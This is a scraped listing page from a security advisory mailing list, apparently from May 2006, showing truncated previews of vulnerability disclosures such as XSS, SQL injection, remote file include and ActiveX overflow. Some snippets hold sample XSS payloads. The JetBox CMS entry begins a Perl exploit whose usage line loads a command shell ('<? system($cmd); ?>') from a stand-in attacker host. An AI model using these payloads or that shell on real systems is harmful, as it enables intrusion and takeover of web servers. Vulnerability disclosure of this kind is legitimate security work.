|
|
Colapse all |
Post message
Idle scan rediscovered!!! 2006-05-05 Joel Jose (joeljose420 gmail com) hello world!, the idle scan was just rediscovered in my lab while i was trying to replicate a dos attack on a windowsxp ,linux(debian sarge) and win2k workstations. I had thought that IDLE scan was a closed chaper after the ipid0 and randomisations were applied( i think Marco Ivald [ more ] [ reply ] Alexadex.com players.py XSS Exploit 2006-05-05 skinnypuppy hushmail ai +++++++++++++++++++++++++++++++++++++ |Alexadex.com players.py XSS Exploit| +++++++++++++++++++++++++++++++++++++ May 04,2006 ++++++++++++++++++++++++++++++++ |XSS Exploition on alexadex.com| ++++++++++++++++++++++++++++++++ http://www.alexadex.com/ad/players?group=<script>alert("SKINNYPU [ more ] [ reply ] Intel wireless service s24evmon.exe confidential information disclosure. 2006-05-02 ruben reversemode com S24EvMon.exe is a service which is part (at least) of the Intel PROset/Wireless software. This application is provided by Intel in order to support intel Wireless Devices based on Spectrum 24 chipsets. This service uses a shared memory section which is created without the proper security descript [ more ] [ reply ] X7Chat <= 2.0.2 avatar XSS injection 2006-05-06 zerogue gmail com X7Chat <= 2.0.2 avatar XSS injection Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate (privilege escalation,possible defacement) X7Chat versions 2.0.2 and below are prone to XSS injection in a user's avatar. By setting this as the url of your avatar: javascript:alert('xss') yo [ more ] [ reply ] [ GLSA 200605-06 ] Mozilla Firefox: Potential remote code execution 2006-05-06 Thierry Carrez (koon gentoo org) PassMasterFlex (and PassMasterFlex+) XSS injection 2006-05-06 zerogue gmail com PassMasterFlex (and PassMasterFlex+) XSS injection Discovered by: Nomenumbra Date: 5/4/2006 impact:moderate (privilege escalation,possible defacement) PassMasterFlex(+) is a database-driven multiple login that utilizes cookies for authentication. PassMasterFlex+ was written not only to pr [ more ] [ reply ] FlexCustomer <= 0.0.4 sql injection 2006-05-06 zerogue gmail com FlexCustomer <= 0.0.4 sql injection Discovered by: Nomenumbra Date: 6/4/2006 impact:high (privilege escalation,defacement) FlexCustomer versions 0.0.4 and below are vulnerable to and SQL injection in the common user and admin-panel login as follows (it really is SQL-injection 101 you know.. [ more ] [ reply ] ChipmunkBoard Multiple Attack vectors 2006-05-06 zerogue gmail com ChipmunkBoard Multiple Attack vectors Discovered by: Nomenumbra Date: 6/4/2006 impact:high (privilege escalation,possible defacement) It is possible to insert the following javascript in the BBcode or supply it as your avatar url: javascript:alert(%27xss%27); Also ChipmunkBoard is pron [ more ] [ reply ] ChipmunkBlogger improper input sanitizing 2006-05-06 zerogue gmail com ChipmunkBlogger improper input sanitizing Discovered by: Nomenumbra Date: 6/4/2006 impact:moderate (privilege escalation,possible defacement) Posts (potentially made by lower-privilege members) and profile names aren't properly sanitized, thus resulting in being vulnerable to the following [ more ] [ reply ] JetBox CMS Remote File Include 2006-05-06 beford (xbefordx gmail com) #!/usr/bin/perl ############ # JetBox CMS Remote File Include # Exploit & Advisory: beford <xbefordx gmail com> # # uso:# perl own.pl <host> <cmd-shell-url> <cmd-var> # perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd # # cmd shell example: <? system($cmd); ?> # cmd variable: [ more ] [ reply ] OpenFAQ - HTML injection and XSS (Cross Site Scripting) 2006-05-06 Kamil Sienicki (K3 spelunca int pl) Script: OpenFAQ Version: 0.4.0 previous version probably too. Language: PHP Problem: HTML injection and XSS (Cross Site Scripting) Vendor: http://sourceforge.net/projects/openfaq Discovered by: Kamil 'K3' Sienicki Description: OpenFAQ is a PHP application that lets Webmasters administrate a Freque [ more ] [ reply ] [ GLSA 200605-05 ] rsync: Potential integer overflow 2006-05-06 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Cryptomathic ActiveX Buffer Overflow (TDC Digital signature) 2006-05-05 CIRT.DK Advisory (advisory cirt dk) A vulnerability has been found in an ActiveX object distributed as part of TDC' Microsoft CSP suite. The suite consists of Cryptomathic PrimeInk CSP and some ActiveX objects. The primary task of the CSP is to handle private RSA keys that are encrypted by keys derived from the user provided passwords [ more ] [ reply ] Re: ISA Server 2004 Log Manipulation 2006-05-05 Steven M. Christey (coley mitre org) (1 replies) >There is a Log Manipulation vulnerability in Microsoft ISA Server >2004, which when exploited will enable a malicious user to manipulate >the Destination Host parameter of the log file. ... >We were able to insert arbitrary characters, in this case the ASCII >characters 1, 2, 3 (respectively) into [ more ] [ reply ] CuteNews 1.4.1 Multiple vulnerabilities 2006-05-05 k4p0k4p0 hotmail com /* --------------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST]® Advisory #20 --------------------------------------------------------------- Program : CuteNews 1.4.1 Homepage: http://www.cutephp.com Vulnerable Versions: CuteNews 1.4.1 & lower ones Risk: Med [ more ] [ reply ] |
|
Privacy Statement |
»www.gavinsharp.com/tmp/ImageVuln.html
[ more ] [ reply ]